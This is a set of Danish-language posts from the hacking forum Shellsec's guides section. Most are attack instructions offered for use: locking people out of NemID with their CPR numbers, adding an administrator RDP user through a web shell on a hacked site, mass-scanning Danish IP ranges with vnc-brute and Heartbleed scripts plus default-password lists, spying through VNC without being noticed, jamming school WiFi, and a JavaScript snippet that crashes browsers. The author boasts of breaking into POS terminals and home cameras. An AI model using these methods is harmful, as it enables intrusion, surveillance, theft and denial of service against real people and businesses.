Shellsec - Vejledninger

Gratis Instagram Followers

Wed, 22 Aug 2018 19:57:37 +0200

jeg faldt over denne side som levere Instagram services. hvor de har en gratis trial på 20 followers (Hver 24 time)
dog giver de altid mere, så tænkte nogle af jer måske kunne bruge det til noget. hvis i har problemer så kan i bare kontakte mig

Skriv hvis i kunne bruge det til noget :)

Link til siden:

Spoiler (Click to View)

[Kompendium - Et sted at starte.] The Path

Mon, 28 May 2018 13:11:02 +0200

OBS: denne tråd er under udvikling.

Hej, jeg går under navnet EngLen, lad mig først starte med at sige: lad nu bare vær med at doxe mig, jeg er nem at finde.
Dette er som så ikke en guide men mere, et sted nye som gamle kan starte og er et Kompendium over ting man kan og, efter min mening, bør give sig i kast med hvis man vil være en hacker.
Men det er bare min mening.

Dan din egen!

OBS: Denne tråd kræver du rent faktisk GIDER at LÆSE.

Fra Wikipedia, den frie encyklopædi Skrev:Kompendium eller kompendie (lat. af com og pendo, 'vejet sammen') er en forkortning, kort sammenfatning eller et uddrag.
Kan bruges som betegnelse for en kortfattet lærebog (ledetråd) og for en sammentrængt fremstilling af en videnskabs hovedindhold.
Udtrykket bruges også inden for fotografering om en særlig form for modlysblænde, en indstillelig bælg, især ved teknisk fotografering

DU KAN LÆRE BASIS PROGRAMMERING FRA > tutorialspoint.com

PROGRAMMING
- C#
- C++
- Python
- Ruby
- Java
  
  DU KAN LÆRE BASIS WEBDEVLOPMENT FRA tutorialspoint > tutorialspoint.com
WEB DEVELOPMENT
- HTML
- CSS
- SCCS(Også kendt som sass)
- PHP
- Javascript

LINUX

Mange vælger at bruge linux(f.eks. Kali linux)Kali Linux er basalt set et Linux Distro der har hundred af hacking tools til rådighed. Men hvad nytter det hvis du ikke ved hvordan du bruger dem? Så i stedet for at gøre som mange gør og installere Kali(eller anden Linux Distro) på din PC eller hvad du nu kunne finde på, Vil jeg råde dig til at installere det dejlige lille program der hedder VirtualBox, da du kan installere det du skal bruge der i. Være det sig LINUX eller WINDOWS.

Du kan enda lave dit helt eget hacking lab og øve dig der. Hvilket jeg klart vil forslå du Googler(google er din ven) dig til hvordan du gør, der er utallige guides på dette så lige det vil jeg ikke gå ind i lige nu.

Den vigtigste del af at være en hacker, er Research. En vær idiot kan hacke, Men få kan VIRKELIG hacke, det tager år og atter år og for andre gør det ikke. Men jeg her brugt år på at lære hvad jeg ved i dag, og det er ikke ret meget faktisk.

[phising attack] Samme domain name

Sat, 17 Feb 2018 01:00:11 +0100

Det er rimeligt let at finde ud af om man er offer for et phising attack. Selve html'en kan nemt kopies til mindste detalje, men domain navnet er anderledes.
Skal du fx logge ind på paypal, så kan du nemt se om det nu også er deres hjemmeside du er på, og ikke blot en phising side. Tja.... Ikke mere.

Hvis du er interesseret kan du læse videre her: https://dev.to/loganmeetsworld/homographs-attack--5a1p

[Guide] Åbn op for din lokale server, så resten af internettet kan tilgå den

Thu, 08 Jun 2017 12:15:11 +0200

Jeg fandt et smukt værktøj for et års tid siden der hedder ngrok. ngrok bruger jeg selv til at tilgå min Amazon Echo jeg har herhjemme, da Amazon kræver en sikker SSL forbindelse mellem min server og deres, og da jeg ikke havde tid eller overskud til at oprette nogle certifikater og finde en måde at bruge det på med Flask i Python.

Dette vil dog mest blive brugt til folk der ikke kan port forwarde.

Så vidt jeg kan finde frem til, kan du åbne op for alt. TCP og HTTP er nok de mest normale, men her er nogle eksempler:

Lave din egen webserver
Tillad adgang til en SSH server
Åbne op for en FTP server
Køre et botnet (til udvikling, ellers skal du passe på)

og mange, mange flere. Det virker på den måde, at du kører en command hvor du specificerer protokollen (for eksempel TCP eller HTTP) samt hvilken port.

Når du så kører commanden, sker der nogle ting:

ngrok åbner "tunnel" til deres server
Deres server opretter en URL
ngrok outputter URLen til dig

Hvis du kører en webserver på port 80 (som du kan tilgå på fx http://localhost/), så kan du meget nemt oprette en tunnel således:

Kode:
ngrok http -region eu 80

Jeg har tilføjet -region eu så den bruger en af deres europæriske servere. Nu får du en URL tilbage, der kunne ligne noget i stil med: http://b172270d.eu.ngrok.io

Går du ind på den URL, vil den vise dig din lokale side! Du kan sende den URL til så mange du har lyst til, og de vil stadigvæk kunne se den. Derudover kan du gøre det "ekstra sikkert", ved at uddele HTTPS URLen (bare skriv https i stedet for http).

Hvis du ejer et domæne, kan du også få den peget over, så den peger på ngrok. Dette kan du læse om her: https://ngrok.com/docs#custom-domains

Vigtig detalje
Hver gang du lukker for ngrok tunnelen og åbner den igen (samme command), vil din URL være anderledes. Dette kan løses ved at oprette en bruger og betale $5 om måneden. Er du studerende, kan du få 40% rabat ved at sende en mail til dem, så det er faktisk rigtig billigt for så fedt et værktøj. Når du har betalt, kan du få dit eget custom subdomæne, så du fx kan oprette http://ash.ngrok.io/ og bruge den samme hver gang.

Håber dette kan hjælpe nogen, hvis de har problemer med at port forwarde eller lignende!

Luk hvilket som helst wifi (almost) + andre features

Sat, 03 Jun 2017 14:38:54 +0200

Hey Shellsec, Stødte på en mega fed lille device den anden dag og købte en

tænkte mange herinde ville synes det var interessant, det er en såkaldt "Wifi Jammer" som gør at du kan tage et netværk som du er i nærheden af og sørge for at alle der er logget på netværket bliver smidt af og ingen kan logge på det indtil du stopper dit "attack"

Det er relativt simpelt at bruge, kræver dog basis viden og lidt tid at sætte op første gang.

Den device du skal bruge hedder "ESP8266" og kan købes online for ca 30 kr +/-

istedet for at forklare hvordan man bruger den linker jeg bare et par videoer da det forklarer det godt, men hvis i har nogen problemer så skriv her i tråden:
https://www.youtube.com/watch?v=N5JVQ-m5Kd0 - træls accent, men viser det fint
https://www.youtube.com/watch?v=r5aoV5AolNo - Bedre video, brugte hans metode til at opdatere devicen osv

når man åbner ESP8266 lige ud af pakken fungerer den ikke ordentligt, men bare følg tutorials på youtube hvordan man opdaterer den og så virker den.

De 2 features jeg bruger er "Death To all" som lukker alle ude af nettet og gør nettet ubrugeligt indtil du slår programmet fra
og "Beacon" Som laver en helvedes masse netværk med enten random navne eller navne du bestemmer (se imgur billede jeg har vedhæftet)

Det er et sjovt tool til at lukke netværk på f.eks. skoler/gymnasier osv osv - det skal dog siges at det er pisse ulovligt at gøre med andres netværk, så pas på

http://imgur.com/a/Feko0 -

[XMPP tutorial] Tilslut dig XMPP.

Sat, 27 May 2017 18:14:07 +0200

Der er forskellige alternativer for klienter så som pidgin, psi og mange flere...

Min fortrukkene er "Tor Messenger" som også tilbyder dig en række andre protocoler at kunne tilslutte, irc osv.

Men Tor Messenger router også automatisk din traffic over klienten gennem tor og tilbyder dig automatisk OTR (Off-the-record) for besked-kryptering.

Det vil sige at det er et default plugin som kommer med klienten og ikke behøves at installeres fra deres hjemmeside.

Kan downloades her: https://dist.torproject.org/tormessenger..._en-US.exe (officielt download link)

Når det er installeret og åbent, så tryk på "tools" og vælg "accounts", tryk så på "New account" nede i bunden af programmet.

Vælg så protocol "XMPP" og tryk "Next", tryk så på "Create this new account on server" og i brugernavn skriv dit brugernavn og i domain skriv, jabber.cz og tryk "Next"

Så skriver du dit password og trykker "Next", så kommer deres captcha op og registration form, skriv præcis samme brugernavn og password og tryk "Next"

Du har nu oprettet dit XMPP account.

Du kan så give din xmpp så de kan ansøge dig, det er bare: ditbrugernavn@jabber.cz

Få adgang til folks facebook bruger!

Wed, 02 Nov 2016 19:57:54 +0100

Slettet, da jeg tænker det vil blive udnyttet for meget? Hmm, dunno..

- Peace

Sådan lukker du folks NemID midlertidigt

Tue, 01 Nov 2016 09:56:02 +0100

NOTE: Det er efter dansk lovgivning strengt forbudt at slå andres CPR numre op og benytte sig af dem.

Fornyligt opdagede jeg en måde på hvor man kan lukke ned for folks NemID midlertidigt i en periode mellem 3-5 dage.
Metoden er sådan set utrolig simpelt, og da alt jo er styret med NemID i dag, så kan det hurtigt blive spændende.

For at denne metode skal virke, så kræver det at du kender deres brugernavn eller cpr-nummer til NemID.
Nogle personer bruger deres e-mail som brugernavn til NemID, og cpr-nummer kan du altid bruge uanset om de har sat et brugernavn til eller ej.
Så det kræver lige lidt research til at starte med. Eventuelt kunne man bruge Tinglysning - Find CPR på folk ud fra navn og fødselsdag

Når du har fundet dit cpr-nummer, brugernavn eller hvad du nu har på personen, så er det sådan set meget simpelt.
Du finder en side hvor du kan login med NemID. - Eksempel: https://service.nemid.nu/dk-da/#log_paa_selvbetjening

Derefter så skriver du Bruger-ID ind, og så skriver du en forkert adgangskode mellem 3 til 5 gangen.
Efter du har skrevet en forkert adgangskode nok, så ville NemID midlertidigt blokere dette NemID.

Brugeren af NemID'et ville derefter modtage en mail med at de er blevet midlertidigt blokeret på NemID, og skal til at bestille en midlertidig adgangskode som ville tage mellem 3-5 dage for at ankomme med Posten,
og da vi alle kender Post Danmark, så kan det sagtens tage længere tid, hvis man er heldig, men brugeren kan intet stille op indtil de har modtaget den midlertidige adgangskode med posten.

.

Thu, 02 Jun 2016 21:28:42 +0200

fjernet

Tutorial - serie: 1 > Lav en RDP via din shell

Fri, 22 Apr 2016 20:12:37 +0200

Denne tutorial vil lære dig hvordan at du via en shell på din hjemmeside let kan lave en RDP og så gøre den til administrator.
Det er ikke en advanceret process men den er klart god at kende hvis man står og mangler noget at lave lidt 'rav' fra og så uden at sætte de samme spor.

Hvis du har en shell på foreksempel: godhatesfags.com/shell.php
Så vil du besøge din shell og trykke dit brugernavn og password og så vil du navigere til shellexec (shell execution)

Du skriver så i kommando-feltet: net user shell sec /add

Denne kommando tilføjer en bruger på serveren med brugernavn: shell og password: sec
Brugernavn: shell
Password: sec

Du vil så få tilbage fra din shell med noget ligende "Command has succesfully been executed".

Du skal nu skrive den sidste linje for at gøre brugeren til en administrator bruger i kommando-feltet: net localgroup administrators shell /add
Den kommando gør brugeren 'shell' til administrator.

Du kan nu logge ind på rdp'en via server ip'en og med brugernavnet: shell og password: sec
Enhver ved hvor man ændre brugernavnet og password i kommandoen.

Alt i alt er det to kommandoer som gør at du via din shell kan lave nogle RDP'er.
Jeg vil anbefalde man max opretter 3 RDP'er på hver shell.

Crash af Firefox, Chrome og Safari (sikkert også flere)

Tue, 26 Jan 2016 16:28:57 +0100

Hey, folks!

Fandt dette sjove script i går, der går ind og crasher ens browser (hvis den bruger samme historik osv. som fx Chrome gør). Alt den faktisk gør, er at sætte en fucking lang streng ind i din historik, hvor den næste bliver dobbelt så lang som den forrige.

Ikke nok med at det crasher din tab.. den crasher også hele browseren. Også selvom Chrome er så smart at køre i processer (skide smart), crasher det stadigvæk hele browseren.

Kører du dette script på en iPhone der kører Safari, crasher den faktisk telefonen. Det er ikke noget jeg har prøvet, men det skriver mange rapporterer og YouTubere har vist det også

var total = "";

for( var i = 0; i < 100000; i++ ) {

    total = total + i.toString();

    history.pushState(0,0, total);

}

Du kan teste dette ved at gå herind:

Tryk kun hvis du har læst overstående (Click to View)

Have fun

Lidt sjov med NMAP

Tue, 02 Sep 2014 20:16:26 +0200

Havde oprindeligt tænkt mig at kalde denne lille frækkert for ’Kedsomhedshacking med NMAP’, da det er en af de utallige ting jeg kan benytte mig af hvis jeg af en eller anden grund ikke har alverden at give mig til. Valgte dog hurtigt at skifte overskrft, da det gik op for mig, at størstedelen nok ville finde dette mere spændende end kedeligt.

EDIT:
Satans. Havde glemt det igen. Har skåret ned fra 35 til 10 billeder! ;)
Blev en halv-lang og rodet smøre, så må lige se om ikke jeg kan indskrænke det lidt.
Har heller ikke stavekontrol på dyret her, så det bliver ordnet senere.

Introduktion
Det er ABSOLUT ikke noget nyt, og min overbevisning er, at mange herinde allerede har været noget lignende igennem. Det er bare sådan, at når man normalt bruger NMAP, så er det for at skanne et målrettet offer (En IP-adresse eller et netværk) - eller også er det for at skanne efter specifikke porte og fejl i diverse services).
Her vil vi nøjes med at skanne efter de mest brugte porte, som benyttes af alle de forskellige enheder som er forbundet til internettet (Om det så er meningen at de skal være det eller ej er en anden sag).

Krav
NMAP – Her bruger vi Zenmap - for at ydnytte den grafiske brugerflade, samt lettere tilgang til tidligere gennemførte skanninger, profiler, plugins osv. http://nmap.org/download.html)
Et styresystem som understøttes af NMAP (Windows, Linux eller Mac)
Zenmap har samme funktioner og brugerflade uafhængig af styresystem, så lige meget hvilket et du foretrækker, vil du stadig være i stand til at følge denne ’tutorial’ uden at afvige fra mine parametre.

Zenmap Vs. Shodan Vs. Google Dorks
Lad os lige få dette på det rene før vi begynder at skanne!

Google Dorks
http://www.exploit-db.com/google-dorks/
Google Dorks er helt sikkert en sjov måde at finde diverse servere, overvågningskameraer, routere osv. med, men der er også nogle småting der gør det mindre attraktivt at benytte:

Citer:- Enhederne skal på forhånd være crawled/cached af Google
- Enhederne må ikke have dynamisk IP
- En million-milliard 1337-HaX0rZ har allerede kendskab til enheder du vil kunne finde igennem Google.

Shodan
http://www.shodanhq.com/
Shodan er et fantastisk projekt, og helt sikkert et jeg har haft min fair andel sjov med. Desværre er flere af de ting der kan ses som uattraktive ved Google Dorks dog også gældende her:

Citer:- Enhederne skal på forhånd være registreret i Shodans database (Hvis enheden var slukket da Shodans skanningsmotor kørte deres ping/banner grab, vil denne enhed være blevet sprunget over)
- Igen må de ikke have dynamisk IP – Så snart de skifter IP vil det kræve at Shodan – tilfældigt – støder på dem igen
- Igen har et HAV af personer allerede kørt listerne igennem uanede gange
- Koster penge hvis du vil mere end bare skimte til et par søgeresultater

Zenmap/NMAP
Med Zenmap skanner vi hele rækker af IP’er, og vil derfor ikke være påvirket af de samme begrænsninger som de 2 ovenstående eksempler. Er en IP online, så ved vi med det samme at der er liv i en enhed af en slags. Kører selvskabet bag forbindelsen med et setup af dynamiske IP’er, så har vi stadig samme problem som før, men det er også en af det eneste negative sider fra de 2 andre metoder vi støder på)

Let’s Do It
Undskylder på forhånd at jeg har fjernet den IP række jeg på nuværende tidspunkt skanner igennem – Det er en guldmine ;)

Citer:Hvis du ikke lige har en liste over danske IP adresser, kan du som udgangspunkt gå til http://www.whatismyip.com/ eller http://myip.dk/ og starte ud med din egen IP. Her kan du så gå op og ned indtil du ikke længere finder resultater der stammer fra en dansk ydbyder. Efter det, kan du begynde at kigge på danske webhost- og email udbydere.

Opsætningen er meget lig den fra min sidste NMAP tutorial, så følgende er gældende:

Citer:nmap -p 22,23,80,443,445,8080,5900 --open --script vnc-brute,ssl-heartbleed xx.xx.231-236.1-255

Citer:nmap: Giver sig selv. Det er det program vi kører - resten er parametre.
-p - Dette er portene vi vil skanne efter:

Citer:- 22 (SSH)
- 23 (Telnet)
- 80 (HTTP)
- 443 (HTTPS)
- 445 (SMB)
- 8080 (Alternativ til port 80, bruges af flere forskellige services)
- 5900 (VNC)
--open: Begrænser vores skanningen til KUN at vise resultater med åbne porte. Uden dette vil vi få en væg af tekst med lukkede og firewalled porte.
--script vnc-brute,ssl-heartbleed: Her vælger vi de script der skal testes på alle online maskiner med portene 5900 og/eller 445 åbne. VNC Brute-Force angreb på opsætninger der udelukkende kører med ingen eller svage kodeord (Og ingen brug af brugernavne) og Heartbleed SSL sårbarheden.
xx.xx.231-236.1-255: IP-adresserne der skal skannes efter.

-- Vi kan bare fylde på af de porte der tilhører diverse services vi er interesserede i.
Tag for eksempel et hurtigt kig efter ”POS manual” eller ”Point-of-Sale Manual” eller ”payment terminal manual” på Google – de har i de fleste tilfælde portene stående under setup/konfiguration.

Hvis vi nu er så heldige at støde på en VNC server uden kodeord, vil vi få følgende output af Zenmap:

(Her kan vi så bruge en hvilket som helst VNC klient / Viewer til at forbinde til værtscomputeren)

Hvorimod hvis vi støder på en forbindelse der endnu ikke er patched mod heartbleed sårbarheden, så vil vi få følgende output:

(Her kan vi så bruge de uendeligt mange Heartbleed scripts til at dumpe hukommelse, hvilket kan være alt fra Kredit Kort, Session, Bruger+Kodeord, Tilfældig HTML osv.)

I langt de fleste tilfælde vil HTTP (port 80) og HTTPS (port 445) dog være de porte vi vil være interesserede i, og hvor vi kan få adgang via vores browser til alle mulige forskellige slags enheder/services.
Og hvis vi nu finder en IP vi gerne vil have lidt ekstra informationer om, såsom styresystem, service-scan og andre åbne porte, så kan vi jo bare kopiere IP adressen ind som ’Target’ og køre f. eks. ’Regular Scan’ eller en af de andre profiler (Eller opsætte vores egen profil).

Nu er der ikke rigtig andet at gøre, end at kopiere disse IP’er ind i vores browser, og se hvad vi støder på. Hvis det er SSL/HTTPS, så husk at skrive ’https://’ foran IP’en.
De fleste af disse enheder vil kræve at du logger ind, før du kan ændre indstillinger, se systemstatus eller se live video. Her ville det bedste være at søge efter lige præcis den enhed du er havnet i, efterfulgt af ’default password’. Her er et par eksempler:

Citer:D-Link default password
Linksys default password
CamEye default password

Her er min liste over mest udbredte kodeord – De vil IKKE komme som en overaskelse ;)

Citer:Brugernavn: admin

Citer:’ ’ - Tomt kodeord
’admin’
’1234’
’12345’
’123456’
’4321’
’1111’
‘11111111’

Blandt andet mange DVR eller IPCam enheder kræver forskellige browsere, og plugins. Internet Explorer er meget udbredt blandt kompatible browsere når det kommer til de lidt ældre enheder. Her kræves det man ændrer lidt i IE’s instillinger for at få lov til at installere usignerede drivers og plugins. Det er bare et spørgsmål om at prøve.

Der er sindsygt mange enheder inden for hvad vi kan kalde Danmarks Kritiske Infrastruktur, som ikke burde være frit tilgængeligt over internettet. Alligevel har jeg fundet uhyggeligt mange af disse, og det er direkte fucked-up. Dem får i dog ikke lov at se. Men med et par timers søgning, er jeg sikker på i selv hurtigt vil få øje på hvor udbredt det er. Vi snakker el- og vandværker der står komplet åbne og klar til at blive angrebet.

Hvad kan vi så bruge det til?

En hel række ting. Her er et par eksempler:

Køre din egen DNS server
Og indtaste dennes IP i forskellige routere du finder. Det kan du bruge til at sniffe folks oplysninger, eller inficere dem ved hjælp af BeeF, Metasploit eller et Exploit Kit.

Udspionere folk eller virksomheder
I ville blive FORBLØFFET hvis i vidste hvor mange overvågningssystemer jeg har fundet, hvis eneste formål er at holde vagt over virksomhedens/personens pengeskab – uviddende om at en tredjepart(mig) kan sidde og kigge med når de indtaster/drejer koden ind. Det samme gælder når det kommer til alarmpaneler/tyverialarmer. Disse kan også sidde lige i skudlinien for deres overvågning.

Indbrud/Røverier
Ikke bare alarmpaneler og pengeskabe kan bruges når det kommer til denne type kriminalitet. Hvis du har adgang til et hjems overvågning, har du adgang til deres dagligdag, vaner, husets layout eventuelle steder de gemmer deres egendele.

Voldtægt?
Det er nu ikke noget jeg går særlig meget op i ;)
Men har en lang række kameaer der er opsat i og omkring familiehjem. Der kan jeg se når forældrene tager på arbejde, og efterlader børnene alene indtil de selv skal i skole. Hvis en psykisk syg person får fat i et sådan overvågningsystem, ville han kunne udnytte det til noget meget grimt.

(D)DoS angreb
Alle disse systemer har utrollight dårlig sikkerhed, og hvis du kan DDoS’e eller DoS’e et system, vil f. eks. deres overvågningssystem være ubrugeligt, og forskellige forbrydelser vil kunne begåes uden at du bliver optaget på bånd eller harddisk.

Bruge det til fremtidige angreb
Der er mange muligheder for at bruge disse enheder til fremtidige angreb. Er telnet aktiveret? Er SSH aktiveret, og kan det brute-forces? Kan enhedens firmware opdateres? Og i så fald, kan du finde firmwaren og reverse engineer den? - Langt størstedelen af plugins er usignerede, og der er ingen tjek der sørger for at disse rent faktisk stammer fra det rette sted.
Hvis du kan, kan du inficere browser plugins, køre command injection, installere SSH eller Netcat, aktivere telnet osv.
Når du har adgang til selve enheden, og ikke bare dens interface, er der næsten 100% chance for at du kan få adgang til andre enheder og computere på netværket.
Du kan jo overføre NMAP til enheden, og skanne hele netværket igennem – UDEN at skulle være bekymret for eventuelle firewalls.

Personligt har jeg brugt denne metode til at få adgang til blandt andet POS systemer over alt i landet. Dette har selvfølgelig udelukkende været for ’educational purposes’ ;)

Den letteste var nok en tankstation der brugte admin/admin til deres online DVR system. Dette DVR system tilladte brugeren at opsætte FTP og Telnet adgang til enheden, og brugte igen admin/admin til forbindelsen. Jeg overførte NMAP, og efter ganske få minutter havde jeg adgang til alle terminalerne, som ovenikøbet ikke havde noget der bare mindede om AV eller IDS. Altså var det næsten skæbnen at de ville have mig til at installere Dexter eller BlackPOS...
I et andet tilfælde kunne jeg køre Netcat igennem reverse engineered firmware, og herefter var historien næsten den samme som før.  Har dog også bricked en helvedes masse enheder ved det. Så det er ikke mit første valg.
Og som nævnt før, så har jeg op til flere forskellige kombinationer til diverse pengeskabe fra en håndfuld firmaer – blandt andet en restaurant jeg er blevet lidt forelsket i. Jeg kan desværre ikke vise jer de aller saftigste fangster, men her er lige lidt blandet for at få en idé om hvad man kan få adgang til:

Et casino (Hvor er det?):

En kiosk:

En restaurrant:

Tilfældige hjem:

Lidt blandede routere (Og en IP-telefon):

En rar mand og en Heat Controller:

Vil lige igen nævne, at dette LANGT fra er det saftigste jeg har fundet, og kun skal opfattes som en lille demonstration. Mulighederne for at begå diverse former for kriminalitet (Også den syge slags) er ubegrænsede når først man har adgang til direkte videoovervågning eller har et fodfæste i netværket!

Ydnyttelse af manglende/svage VNC opsætninger

Sat, 16 Aug 2014 16:13:15 +0200

(Var lidt i tvivl om hvor den skulle placeres. Synes ikke helt brute-force var den rigtige sektion)

Sad og nød min morgenkaffe sammen med dagens diverse nyheder, da jeg faldt over denne artikel fra Sophos' NakedSecurity blog:
( https://nakedsecurity.sophos.com/2014/08...hijacking/ )
Det går i bund og grund ud på at skanne ip-rækker for VNC, og så teste om disse er usikre opsat og ikke benytter kodeord til fjernforbindelsen.

Havde ikke selv tænkt på at dette var et problem der var så omfattende igen. Sidder ofte og skanner store rækker af IP'er igennem, og port 5900(standart VNC port) er alt efter mine intentioner en port jeg tit tilføjer til listen (Sammen med porten til den specifikke service jeg prøver at skaffe adgang til).
Tænkte det ville være en god idé lige at afprøve deres fund selv, for at få et større indblik i, om dette nu også er et problem herhjemme i Danmark.

Idéen var egentligt at skrive et lille hurtigt script til Nmap ved hjælp af NSE(Nmap Scripting Engine) og dettes tilhørende VNC library. Men før jeg nåede at lave mere end Head og Rule sektionerne (NSE består af Head, Rule og en Action sektion), faldt jeg over dette handy script:
( https://svn.nmap.org/nmap/scripts/vnc-brute.nse )

Hvad dette script gør, er at forbinde til en VNC service under skanningen, teste om forbindelsen kræver brugernavn OG kodeord eller KUN et kodeord. Hvis det eneste krav er et kodeord, forsøger scriptet at brute-force dette med de sædvanlige svage loginoplysninger vi stadig ser blive brugt.
Af 'svage loginoplysninger' må siges at Intet Kodeord helt klart topper listen, og dette er der også taget hensyn for i vnc-brute.

Jeg har endnu ikke været så heldig at brute-force et eksiterende kodeord, men tilgengældt har jeg fundet Massere af klienter der ikke har anvendt kodeord.

Hvis det er noget i kunne tænke jer at give et forsøg, er det egentlig en UTROLIG let process. Selv for dem som måske ikke har brugt Nmap før.
Her er en lille 'overflødig' gennemgang til jer der ikke har leget med det før:

1) Download og installér Nmap - eller Zenmap (GUI version med grafisk brugerflade)
http://nmap.org/zenmap/
Har man Kali/Backtrack eller et andet sikkerheds-orienteret styresystem, burde Nmap selvfølgelig allerede være installeret.

2) Du skal efterhånden køre en Gammel version af Nmap for at dette script ikke er pakket sammen med programmet, men hvis du gør, så OPDATER for pokker. Hvis dette ikke er en mulighed, så kan scriptet downloades på nedenstående link:
https://svn.nmap.org/nmap/scripts/vnc-brute.nse

3) Nu kører vi Nmap eller Zenmap med følgende parametre (Om det er Nmap eller Zenmap er fuldstændig lige meget. Zenmap er KUN en integreret grafisk brugerflade til Nmap, og alle kommandoer og valgmuligheder er de samme:

Citer:
nmap -p 5900 --open --script vnc-brute 127.0.0.1

Citer:
nmap: Giver sig selv. Det er det program vi kører - resten er parametre.
-p 5900: Dette er porten vi vil skanne efter. (Her kan vi også skanne efter flere porte på éen gang - f. eks. -p 21,22,23,80,443,500-700 - sidstnævnte skanner alle porte i rækken 500 - 700. Et godt eksempel her kunne være at skanne efter en kendt port til et stykke Point-of-Sale software og samtidig se om maskinen det kører på tillader fjernstyrring.
--open: Begrænser vores skanningen til KUN at vise resultater med åbne porte. Uden dette vil vi få en væg af tekst med lukkede og firewalled porte.
--script vnc-brute: Her vælger vi det script der skal testes på alle online maskiner med port 5900 åben. (Hvis scriptet ikke er pakket med Nmap kan du bruge '--script "C:\\StienTilFilen\\vnc-brute.nse"'.
127.0.0.1: IP-adressen eller rækken der skal skannes efter. Hvis du vil skanne en række frem for en enkelt IP kan følgende bruges:
47.148.151.1-255 - Skanner 47.148.151.1 til 47.148.151.255
47.148.151-160.1-255 - Skanner 47.148.151.1 til 47.148.160.255

Når Nmap finder en VNC service der ikke bruger kodeord, får vi fælgende output:

Citer:
5900/tcp open vnc

|_vnc-brute: No authentication required

Hvis der bare står følgende (Uden VNC-Brute output):

Citer:
5900/tcp open vnc

Betyder det et brugernavn også er krævet.

4) Nu kan vi så bruge RealVNC til at forbinde til IP-adressen:
https://www.realvnc.com/download/
Download VNC Viewer. Det virker til alle de store styresytemer, og der er ingen grund til at hente den fulde pakke, da vi ikke har tænkt os at køre en server.

Her ville det være smart - FØR - du trykker på connect, at gå ind i 'OPTIONS' og trykke på den checkbox under 'Input' der hedder 'View-only'. Dette gør er vores tastatur og mus ikke forstyrre brugeren, og derved afslører vores tilstedeværelse.

Her er der lige et par eksempler på, hvad man kan være heldig at få adgang til:

Vi er ikke bare navnebrødre, hans skrivebord minder uhyggeligt meget om mit!

Her kunne man jo være fræk, og skrive sin egen besked. Måske enda lave lidt grafik der passer til. Har fundet flere af disse oplysningstavler - selv i en lufthavn - hvilket i værste fald kan medføre videre adgang til det interne system.

[align=center]Har MANGE flere hvor de kommer fra. Men tror det er betydeligt sjovere hvis i selv giver det et forsøg

hej ville selv side og lære noget java!.

Sat, 01 Mar 2014 12:42:29 +0100

jeg har påbegyndt noget der minder om java altså lignende med eksempelvis c#!.

så ville høre om i kunne bidrage med noget viden som jeg kan lære af?.

altså ville gerne starte på at lave nogle sockets og rats i forskellige definitioner så som hvis det er aktuelt for jer her og nu!.

hvis det med sockets og de andre mulige metoder til fks. java og lignende må nogle godt poste deres viden om det her!. det er en bare ren nysgerrighed:). er selv lidt i gang med at kode java så det er for fedt!.

Hack spils highscore med Tamper Data

Sat, 23 Mar 2013 00:06:19 +0100

Denne guide viser hvordan du kan bruge firefox addonet Tamper Data til at hacke highscores i flash spil.

Hent og installer Taper data:
https://addons.mozilla.org/en-us/firefox...mper-data/

I eksempelet her vil jeg gerne have den højeste highscore i spillet Boxhead:
http://www.crazymonkeygames.com/Boxhead-...Rooms.html

Start spillet og spil så længe du gider. (eller lad dig dø med det samme). Du vil blive mødt af den skærm hvor du skal angive dit navn til highscorelisten.

1. Indtast dit navn

2. Klik på Funktioner | Tamper Data i Firefox for at start Tamper Data

Tamper Data åbnes
3. Klik på knappen Start Tamper
4. Klik på knappen SEND SCORE i browseren

I Tamper Data åbnes en popup

5. Klik på knappen Tamper

Herefter har du mulighed for at ændre ved de værdier som spillet sender til highscoren. I venstre side af dialogboksen findes en parameter, som bland andet indeholder informationer om hvilken scor du fik i spillet.

6. Ændre scoren til det du ønsker- dog skal du i dette eksempel holde dig til 12 cifre.

7. Klik på knappen OK

Du vil herefter få endnu en popup i Tamper Data

8. Klik på knappen Submit

Herefter kan du stoppe Tamper Data

9.Klik på Stop Tamper

Du bliver nu automatisk send til highscore listen, hvis ikke kan du selv gå til den.

10.Klik på View Highscore

Du vil nu se at du er kommet på highscore listen med den score du indsatte i Tamper Data

Vær opmærksom på at ikke det ikke fungerer ved alle flashspil, da nogle af dem har indbyggede forskellige sikkerhedsparametre. Prøv dig lidt frem og se om du kan finde nogle flashspil hvor man skal submitte sin highscore til sidst.
Det er rimelig simpelt eksempel, men Tamper Data kan bruges til meget mere end det. Forstil dig f.eks. hjemmesider hvor du kan ændre på prisen på en vare før du bestiller den.